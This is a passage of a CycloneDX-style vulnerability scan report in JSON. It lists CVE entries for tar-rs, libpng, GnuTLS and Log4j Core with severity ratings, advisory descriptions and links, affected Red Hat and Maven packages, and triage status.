        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-33056",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        61
      ],
      "description": "tar-rs is a tar archive reading/writing library for Rust. In versions 0.4.44 and below, when unpacking a tar archive, the tar crate's unpack_dir function uses fs::metadata() to check whether a path that already exists is a directory. Because fs::metadata() follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory \u2014 and subsequently apply chmod to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root. This issue has been fixed in version 0.4.45.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33056"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33056"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33056"
        },
        {
          "url": "https://rustsec.org/advisories/RUSTSEC-2026-0067.html"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8138-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8139-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8168-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33056"
        }
      ],
      "published": "2026-03-20T08:16:11+00:00",
      "updated": "2026-03-24T16:17:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.34-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-33416",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.2.1 through 1.6.55, `png_set_tRNS` and `png_set_PLTE` each alias a heap-allocated buffer between `png_struct` and `png_info`, sharing a single allocation across two structs with independent lifetimes. The `trans_alpha` aliasing has been present since at least libpng 1.0, and the `palette` aliasing since at least 1.2.1. Both affect all prior release lines. `png_set_tRNS` sets `png_ptr->trans_alpha = info_ptr->trans_alpha` (256-byte buffer) and `png_set_PLTE` sets `info_ptr->palette = png_ptr->palette` (768-byte buffer). In both cases, calling `png_free_data` (with `PNG_FREE_TRNS` or `PNG_FREE_PLTE`) frees the buffer through `info_ptr` while the corresponding `png_ptr` pointer remains dangling. Subsequent row-transform functions dereference and, in some code paths, write to the freed memory. A second call to `png_set_tRNS` or `png_set_PLTE` has the same effect, because both functions call `png_free_data` internally before reallocating the `info_ptr` buffer. Version 1.6.56 fixes the issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33416"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9693"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33416"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451805"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451819"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455901"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455908"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33416"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33636"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5731"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5732"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5734"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-9693.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:8459"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/23019269764e35ed8458e517f1897bd3c54820eb"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/7ea9eea884a2328cc7fdcb3c0c00246a50d90667"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/a3a21443ed12bfa1ef46fa0d4fb2b74a0fa34a25"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/c1b0318b393c90679e6fa5bc1d329fd5d5012ec1"
        },
        {
          "url": "https://github.com/pnggroup/libpng/pull/824"
        },
        {
          "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-m4pc-p4q3-4c7j"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-33416.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-9693.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33416"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8251-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33416"
        }
      ],
      "published": "2026-03-26T17:16:38+00:00",
      "updated": "2026-04-02T20:28:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-12.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-33636",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125,
        787
      ],
      "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.6.36 through 1.6.55, an out-of-bounds read and write exists in libpng's ARM/AArch64 Neon-optimized palette expansion path. When expanding 8-bit paletted rows to RGB or RGBA, the Neon loop processes a final partial chunk without verifying that enough input pixels remain. Because the implementation works backward from the end of the row, the final iteration dereferences pointers before the start of the row buffer (OOB read) and writes expanded pixel data to the same underflowed positions (OOB write). This is reachable via normal decoding of attacker-controlled PNG input if Neon is enabled. Version 1.6.56 fixes the issue.",
      "recommendation": "Upgrade libpng to version 2:1.6.37-12.el9_7.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33636"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9693"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33636"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451805"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451819"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455901"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455908"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33416"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33636"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5731"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5732"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5734"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-9693.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:8459"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/7734cda20cf1236aef60f3bbd2267c97bbb40869"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/aba9f18eba870d14fb52c5ba5d73451349e339c3"
        },
        {
          "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-wjr5-c57x-95m2"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-33636.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-9693.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33636"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8251-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33636"
        }
      ],
      "published": "2026-03-26T17:16:41+00:00",
      "updated": "2026-04-02T18:42:02+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-12.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-33845",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        191
      ],
      "description": "A flaw in GnuTLS DTLS handshake parsing allows malformed fragments with zero length and non-zero offset, leading to an integer underflow during reassembly and resulting in an out-of-bounds read. This issue is remotely exploitable and may cause information disclosure or denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33845"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13274"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33845"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450624"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33845"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33845"
        }
      ],
      "published": "2026-04-30T18:16:28+00:00",
      "updated": "2026-05-05T03:03:19+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.8.3-10.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-33846",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        130
      ],
      "description": "A heap buffer overflow vulnerability exists in the DTLS handshake fragment reassembly logic of GnuTLS. The issue arises in merge_handshake_packet() where incoming handshake fragments are matched and merged based solely on handshake type, without validating that the message_length field remains consistent across all fragments of the same logical message. An attacker can exploit this by sending crafted DTLS fragments with conflicting message_length values, causing the implementation to allocate a buffer based on a smaller initial fragment and subsequently write beyond its bounds using larger, inconsistent fragments. Because the merge operation does not enforce proper bounds checking against the allocated buffer size, this results in an out-of-bounds write on the heap. The vulnerability is remotely exploitable without authentication via the DTLS handshake path and can lead to application crashes or potential memory corruption.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33846"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13274"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33846"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450625"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33846"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33846"
        }
      ],
      "published": "2026-05-04T10:15:59+00:00",
      "updated": "2026-05-04T15:22:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.8.3-10.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-34477",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        297,
        295
      ],
      "description": "The fix for CVE-2025-68161 (https://logging.apache.org/security.html#CVE-2025-68161) was incomplete: it addressed hostname verification only when enabled via the log4j2.sslVerifyHostName (https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName) system property, but not when configured through the verifyHostName (https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName) attribute of the <Ssl> element.\n\nAlthough the verifyHostName configuration attribute was introduced in Log4j Core 2.12.0, it was silently ignored in all versions through 2.25.3, leaving TLS connections vulnerable to interception regardless of the configured value.\n\nA network-based attacker may be able to perform a man-in-the-middle attack when all of the following conditions are met:\n\n  * An SMTP, Socket, or Syslog appender is in use.\n  * TLS is configured via a nested <Ssl> element.\n  * The attacker can present a certificate issued by a CA trusted by the appender's configured trust store, or by the default Java trust store if none is configured.\n\nThis issue does not affect users of the HTTP appender, which uses a separate verifyHostname (https://logging.apache.org/log4j/2.x/manual/appenders/network.html#HttpAppender-attr-verifyHostName) attribute that was not subject to this bug and verifies host names by default.\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.",
      "recommendation": "Upgrade org.apache.logging.log4j:log4j-core to version 2.25.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34477"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34477"
        },
        {
          "url": "https://github.com/apache/logging-log4j2"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/pull/4075"
        },
        {
          "url": "https://lists.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc097lq4"
        },
        {
          "url": "https://logging.apache.org/cyclonedx/vdr.xml"
        },
        {
          "url": "https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName"
        },
        {
          "url": "https://logging.apache.org/security.html#CVE-2026-34477"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34477"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34477"
        }
      ],
      "published": "2026-04-10T16:16:30+00:00",
      "updated": "2026-05-06T16:49:51+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3",
          "versions": [
            {
              "version": "2.25.3",
